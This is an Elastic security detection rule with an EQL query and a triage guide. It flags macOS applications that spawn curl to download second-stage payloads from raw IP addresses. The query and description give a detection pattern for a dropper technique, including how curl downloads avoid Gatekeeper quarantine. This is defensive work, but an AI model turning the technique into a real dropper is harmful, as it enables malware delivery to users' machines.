Suspicious Curl from macOS Application

 1[metadata]
 2creation_date = "2026/01/30"
 3integration = ["endpoint"]
 4maturity = "production"
 5updated_date = "2026/01/30"
 6
 7[rule]
 8author = ["Elastic"]
 9description = """
10Detects the use of curl by a macOS application binary to connect to a raw IP URI and download a second 
11stage payload. Threat actors often utilize a benign looking or legitimate application as a first stage 
12dropper. Curl is commonly used as it doesn't enforce Gatekeeper checks.
13"""
14from = "now-9m"
15index = ["logs-endpoint.events.process-*"]
16language = "eql"
17license = "Elastic License v2"
18name = "Suspicious Curl from macOS Application"
19references = [
20    "https://objective-see.org/blog/blog_0x71.html#-vpn-trojan-covid",
21    "https://attack.mitre.org/techniques/T1105/"
22]
23risk_score = 73
24rule_id = "6da6f80f-fe41-4814-8010-453e6164bd40"
25severity = "high"
26tags = [
27    "Domain: Endpoint",
28    "OS: macOS",
29    "Use Case: Threat Detection",
30    "Tactic: Command and Control",
31    "Data Source: Elastic Defend",
32    "Resources: Investigation Guide"
33]
34timestamp_override = "event.ingested"
35type = "eql"
36note = """## Triage and analysis
37
38> **Disclaimer**:
39> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
40
41### Investigating Suspicious Curl from macOS Application
42
43Trojanized macOS applications often use curl to download second-stage payloads from attacker-controlled infrastructure. By leveraging curl instead of direct downloads, these malicious applications can bypass Gatekeeper quarantine checks and evade built-in macOS security mechanisms. This detection rule identifies when applications from the /Applications directory spawn curl to connect to raw IP addresses, which is highly indicative of malicious payload retrieval activity.
44
45### Possible investigation steps
46
47- Review the process.Ext.effective_parent.executable field to identify which application spawned the curl process and assess whether this application is expected to make network downloads.
48- Examine the process.args fields to extract the destination IP address and URL path being accessed, and research these indicators in threat intelligence databases.
49- Analyze the process.parent.command_line to understand the full context of how curl was invoked, including any output file paths that may indicate where payloads were written.
50- Check the code signature of the parent application using the process.code_signature fields to determine if it is validly signed and if the signature matches known good versions.
51- Investigate the origin of the suspicious application by reviewing installation logs, download history, and any recent DMG or PKG files that may have delivered the trojanized application.
52- Search for any files created on disk around the time of the curl execution to identify downloaded payloads that may have been staged for execution.
53- Correlate with other events on the same host to identify if the downloaded payload was subsequently executed.
54
55### False positive analysis
56
57- Some legitimate applications may use curl for software updates or telemetry data collection. Verify the destination IP against the application vendor's known infrastructure.
58- Development tools and IDEs may download dependencies or packages via curl during normal operations. Review the context and confirm with development teams.
59- Homebrew and package managers may spawn curl from application contexts during installations. Verify if package management activities were expected.
60- Add verified legitimate applications to the exclusion list in the query after confirming their behavior is expected.
61
62### Response and remediation
63
64- Immediately quarantine the suspicious application by moving it to a secure location and removing it from /Applications to prevent further execution.
65- Block the destination IP address at the network perimeter and on endpoint firewalls to prevent additional downloads.
66- Search the file system for any payloads that may have been downloaded and quarantine them for analysis.
67- Conduct a full malware scan on the affected system to identify any persistence mechanisms or additional malware components.
68- Report the trojanized application to Apple Security and relevant threat intelligence sharing platforms.
69- Review other systems in the environment for the same trojanized application to determine the scope of potential compromise.
70- Investigate the delivery mechanism to understand how the trojanized application was installed and prevent future infections.
71"""
72query = '''
73process where host.os.type == "macos" and event.type == "start" and event.action == "exec" and 
74  process.name in ("curl", "nscurl") and 
75  process.args in ("-o", "--output", "--download", "-dl", "-dir", "--directory") and
76  process.args regex~ """http.*:\/\/[0-9]{2,3}.[0-9]{2,3}.[0-9]{2,3}.[0-9]{2,3}\/.*""" and 
77  process.parent.name like~ ("bash", "sh", "zsh", "osascript", "tclsh*", "python*") and
78  process.Ext.effective_parent.executable like "/Applications/*" and
79  process.args_count <= 10 and 
80  not process.args like "/Applications/*" and
81  not process.Ext.effective_parent.executable in ("/Applications/iTerm.app/Contents/MacOS/iTerm2",
82                                                   "/Applications/Visual Studio Code.app/Contents/MacOS/Electron", 
83                                                   "/Applications/Warp.app/Contents/MacOS/stable")
84'''
85
86[[rule.threat]]
87framework = "MITRE ATT&CK"
88
89  [rule.threat.tactic]
90  name = "Command and Control"
91  id = "TA0011"
92  reference = "https://attack.mitre.org/tactics/TA0011/"
93
94  [[rule.threat.technique]]
95  name = "Ingress Tool Transfer"
96  id = "T1105"
97  reference = "https://attack.mitre.org/techniques/T1105/"